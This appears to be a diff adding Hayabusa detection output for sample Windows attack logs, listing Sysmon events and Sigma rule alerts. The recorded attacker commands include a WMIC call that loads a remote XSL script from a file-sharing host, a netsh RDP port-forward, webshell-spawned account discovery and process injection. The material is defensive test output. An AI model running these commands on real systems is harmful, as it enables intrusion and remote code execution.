+2019-05-24 01:49:08.208 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49167 (IEWIN7..home) | Dst: 45.76.12.27:443 (45-76-12-27.static.afterburst.com) | User: IEWIN7\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:08.422 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: wmic process list /format:""https://a.uguu.se/x50IGVBRfr55_test.xsl"" | LID: 0xf347 | PID: 4056 | PGUID: 365ABB72-CF04-5CE6-0000-001010F20C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:49:09.576 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49168 (IEWIN7..home) | Dst: 105.73.6.105:80 (aka105.inwitelecom.net) | User: IEWIN7\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 3872 | PGUID: 365ABB72-CF01-5CE6-0000-00105DA50C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 01:50:44.582 +09:00,IEWIN7,1,info,,Process Created,Cmd: wmiadap.exe /F /T /R | Process: C:\Windows\System32\wbem\WMIADAP.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 708 | PGUID: 365ABB72-CF64-5CE6-0000-0010CBD51100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_wmic_xsl_internet_sysmon_3_1_11.evtx
+2019-05-24 02:26:08.716 +09:00,IEWIN7,1,info,,Process Created,"Cmd: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat | Process: \\vboxsrv\HTools\msxsl.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0xf347 | PID: 3388 | PGUID: 365ABB72-D7B0-5CE6-0000-001077C56D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
+2019-05-24 02:26:08.716 +09:00,IEWIN7,1,medium,Evas,XSL Script Processing,,rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
+2019-05-24 02:26:08.947 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - Suspicious Microsoft.XMLDOM module load | Image: C:\Windows\System32\msxml3.dll | Process: \\vboxsrv\HTools\msxsl.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 3388 | PGUID: 365ABB72-D7B0-5CE6-0000-001077C56D00 | Hash: SHA1=723644A78C703DF177235E820A906B9621B9B2FB,MD5=3CB096F266A52F65A571B2A3FC81D13E,SHA256=12D498F5310AD70818C7251B5D6AAF145CD7FA67887125645E245D856347BFAA,IMPHASH=EF7BEA73AB4F834F0C44DDE0150B5648",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
+2019-05-24 02:26:09.437 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: msxsl.exe c:\Users\IEUser\AppData\Roaming\Adobe\test.dat c:\Users\IEUser\AppData\Roaming\Adobe\test.dat | LID: 0xf347 | PID: 2240 | PGUID: 365ABB72-D7B1-5CE6-0000-00102CD76D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_msxsl_xsl_sysmon_1_7.evtx
+2019-05-24 02:45:34.538 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xf347 | PID: 712 | PGUID: 365ABB72-DC3E-5CE6-0000-00102BC97200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
+2019-05-24 02:46:04.671 +09:00,IEWIN7,1,info,,Process Created,"Cmd: netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5 | Process: C:\Windows\System32\netsh.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf347 | PID: 4088 | PGUID: 365ABB72-DC5C-5CE6-0000-001066E27200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
+2019-05-24 02:46:04.671 +09:00,IEWIN7,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
+2019-05-24 02:46:04.671 +09:00,IEWIN7,1,high,LatMov | Evas | C2,Netsh RDP Port Forwarding,,rules/sigma/process_creation/proc_creation_win_netsh_port_fwd_3389.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_portforward_netsh_rdp_sysmon_13_1.evtx
+2019-05-24 10:33:53.112 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""c:\windows\system32\cmd.exe"" /c net user | Process: C:\Windows\System32\cmd.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipm719e5ea8-b97b-40d0-96b6-44cca91790fe -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x9cf992 | PID: 2404 | PGUID: 365ABB72-4A01-5CE7-0000-0010EE9DAC00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.112 +09:00,IEWIN7,1,high,Persis,Shells Spawned by Web Servers,,rules/sigma/process_creation/proc_creation_win_webshell_spawn.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.122 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: c:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2580 | Src PGUID: 365ABB72-49D6-5CE7-0000-001020A7A700 | Tgt PID: 2404 | Tgt PGUID: 365ABB72-4A01-5CE7-0000-0010EE9DAC00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.122 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.182 +09:00,IEWIN7,1,info,,Process Created,"Cmd: net user | Process: C:\Windows\System32\net.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: ""c:\windows\system32\cmd.exe"" /c net user | LID: 0x9cf992 | PID: 788 | PGUID: 365ABB72-4A01-5CE7-0000-00102DA1AC00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.182 +09:00,IEWIN7,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.192 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\net1 user | Process: C:\Windows\System32\net1.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: net user | LID: 0x9cf992 | PID: 712 | PGUID: 365ABB72-4A01-5CE7-0000-0010B6A2AC00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-24 10:33:53.192 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_typical_IIS_webshell_sysmon_1_10_traces.evtx
+2019-05-25 00:38:21.485 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - PowerShell ExecPolicy Changed | SetValue: HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell\ExecutionPolicy: Unrestricted | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3208 | PGUID: 365ABB72-0FAE-5CE8-0000-0010FE1E0800,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_powershell_execpolicy_changed_sysmon_13.evtx
+2019-05-26 13:01:42.385 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x12962 | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:42.385 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:42.545 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Evasion - Possible DLL Side Loading via jjs.exe | Image: C:\Users\IEUser\Desktop\info.rar\jli.dll | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00 | Hash: SHA1=E6F33CBE295026319CF9DB3CA665BC2BC9D978AC,MD5=CE150468126EAE5D99359DDE3197B6EA,SHA256=02B95EF7A33A87CC2B3B6FD47DB03E711045974E1ECF631D3BA9E076E1E374E9,IMPHASH=D386CCEF9C3130690E1183697F8E3ED9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:42.966 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Evasion - Possible DLL Side Loading via jjs.exe | Image: C:\Users\IEUser\Desktop\info.rar\jli.dll | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00 | Hash: SHA1=E6F33CBE295026319CF9DB3CA665BC2BC9D978AC,MD5=CE150468126EAE5D99359DDE3197B6EA,SHA256=02B95EF7A33A87CC2B3B6FD47DB03E711045974E1ECF631D3BA9E076E1E374E9,IMPHASH=D386CCEF9C3130690E1183697F8E3ED9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:42.966 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:42.966 +09:00,IEWIN7,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:43.567 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src PID: 3884 | Src PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00 | Tgt PID: 3908 | Tgt PGUID: 365ABB72-0FA7-5CEA-0000-001064C60A00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:43.567 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\svchost.exe | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Users\IEUser\Desktop\info.rar\jjs.exe"" | LID: 0x3e7 | PID: 3908 | PGUID: 365ABB72-0FA7-5CEA-0000-001064C60A00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:43.567 +09:00,IEWIN7,1,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:43.567 +09:00,IEWIN7,1,critical,Evas | PrivEsc,Suspect Svchost Activity,,rules/sigma/process_creation/proc_creation_win_susp_svchost_no_cli.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:43.567 +09:00,IEWIN7,1,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:44.047 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | PID: 3836 | PGUID: 365ABB72-0FA6-5CEA-0000-001049B50A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-26 13:01:44.598 +09:00,IEWIN7,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\info.rar\jjs.exe | PID: 3884 | PGUID: 365ABB72-0FA6-5CEA-0000-0010FEC30A00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/apt10_jjs_sideloading_prochollowing_persist_as_service_sysmon_1_7_8_13.evtx
+2019-05-27 00:47:56.667 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:56.667 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\System32\notepad.exe | Process: C:\Windows\System32\notepad.exe | User: IIS APPPOOL\DefaultAppPool | Parent Cmd: c:\windows\system32\inetsrv\w3wp.exe -ap ""DefaultAppPool"" -v ""v2.0"" -l ""webengine4.dll"" -a \\.\pipe\iisipmb9da32d5-aa43-42fc-aeea-0cc226e10973 -h ""C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config"" -w """" -m 0 -t 20 | LID: 0x82423 | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:56.667 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:56.727 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\windows\system32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fff | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:56.727 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:57.628 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\inetsrv\w3wp.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2744 | Src PGUID: 365ABB72-B26B-5CEA-0000-0010582A0800 | Tgt PID: 3388 | Tgt PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:57.628 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:58.830 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49166 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:58.830 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49167 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:58.830 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:59.871 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49168 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:59.871 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49169 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:47:59.871 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:00.732 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:7777 (IEWIN7) | Dst: 127.0.0.1:49170 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:00.732 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49171 (IEWIN7) | Dst: 127.0.0.1:135 (IEWIN7) | User: IIS APPPOOL\DefaultAppPool | Process: C:\Windows\System32\notepad.exe | PID: 3388 | PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:00.732 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:00.752 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\notepad.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 3388 | Src PGUID: 365ABB72-B52C-5CEA-0000-00107A0D1100 | Tgt PID: 1240 | Tgt PGUID: 365ABB72-B530-5CEA-0000-0010621A1100,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:00.752 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\notepad.exe | LID: 0x3e7 | PID: 1240 | PGUID: 365ABB72-B530-5CEA-0000-0010621A1100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:01.864 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.13:49172 (IEWIN7) | Dst: 10.0.2.18:888 () | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\notepad.exe | PID: 1240 | PGUID: 365ABB72-B530-5CEA-0000-0010621A1100,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
+2019-05-27 00:48:01.864 +09:00,IEWIN7,3,high,C2 | Exec | Evas,Notepad Making Network Connection,,rules/sigma/network_connection/sysmon_notepad_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_rotten_potato_from_webshell_metasploit_sysmon_1_8_3.evtx
